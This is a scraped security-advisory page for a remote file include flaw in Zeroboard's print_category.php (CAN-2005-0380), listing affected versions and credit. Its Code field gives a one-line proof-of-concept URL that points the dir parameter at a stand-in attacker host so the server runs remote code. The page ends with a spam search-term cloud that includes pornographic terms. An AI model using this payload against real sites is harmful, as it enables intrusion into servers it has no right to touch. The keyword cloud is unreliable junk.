exploits , vulnerabilities , articles , Zeroboard Print_Category.PHP Remote File Include Vulnerability
| Title |
Zeroboard Print_Category.PHP Remote File Include Vulnerability |
| Published |
2005-01-13-12:00AM |
| Updated |
2005-01-13-10:51PM |
| Class |
Input Validation Error |
| CVE |
CAN-2005-0380 |
| Remote |
Yes |
| Local |
No |
| Credit |
Discovery of this vulnerability is credited to Jeremy Bae at STG Security. |
| Vulnerable |
Zeroboard Zeroboard 4.1 pl5
Zeroboard Zeroboard 4.1 pl4
Zeroboard Zeroboard 4.1 pl3
Zeroboard Zeroboard 4.1 pl2
Debian Linux 2.2 68k
Debian Linux 2.2 alpha
Debian Linux 2.2 arm
Debian Linux 2.2 IA32
Debian Linux 2.2 powerpc
Debian Linux 2.2 sparc
MandrakeSoft Linux Mandrake 8.0
MandrakeSoft Linux Mandrake 8.0 ppc
MandrakeSoft Linux Mandrake 8.1
MandrakeSoft Linux Mandrake 8.1 ia64
MandrakeSoft Linux Mandrake 8.2
RedHat Linux 6.2 alpha
RedHat Linux 6.2 i386
RedHat Linux 6.2 sparc
RedHat Linux 7.0 alpha
RedHat Linux 7.0 i386
RedHat Linux 7.0 sparc
RedHat Linux 7.1 alpha
RedHat Linux 7.1 i386
RedHat Linux 7.1 ia64
RedHat Linux 7.2 i386
RedHat Linux 7.2 ia64
RedHat Linux 7.3 i386
S.u.S.E. Linux 6.4 alpha
S.u.S.E. Linux 6.4 i386
S.u.S.E. Linux 6.4 ppc
S.u.S.E. Linux 7.0 alpha
S.u.S.E. Linux 7.0 i386
S.u.S.E. Linux 7.0 ppc
S.u.S.E. Linux 7.0 sparc
S.u.S.E. Linux 7.1 alpha
S.u.S.E. Linux 7.1 ppc
S.u.S.E. Linux 7.1 sparc
S.u.S.E. Linux 7.1 x86
S.u.S.E. Linux 7.2 i386
S.u.S.E. Linux 7.3 i386
S.u.S.E. Linux 7.3 ppc
S.u.S.E. Linux 7.3 sparc
S.u.S.E. Linux 8.0 i386
|
| Not Vulnerable |
|
| Code |
No exploit is required and the following proof of concept is available:
http://www.example.com/[zeroboard]/include/print_category.php?setup[use_category]=1&dir=http://[attacker]/
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Thu, 17 Dec 2009 08:14:32 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
BOIIYWOODS naked pics dmoz.im www.sse6.c Www.girls /search/ex Freexxxmov sponge.htm mywebland pornokl&am download n www.tjpeix Apache/2.2 indian hot php-nuke 2 www.Fuckin SEX vid Orkut.com\ php-...at_ www.js008. 200 /compo OpenSSH De mosconfig. news for c www.angles Simple Inv pornhu FOTO&a 200 /compo www.wzcy.a 200 /compo maxcpm.inf vuln/explo www.mqdm.n Define Annutochka www.mqdm.n joomla rem www.89sexc www.adultv sexse imag php-nuke+a www.nepali www.njzkkj all+cartoo entropysea nx server 2006 07 19 phpbbportv Erwin Data
|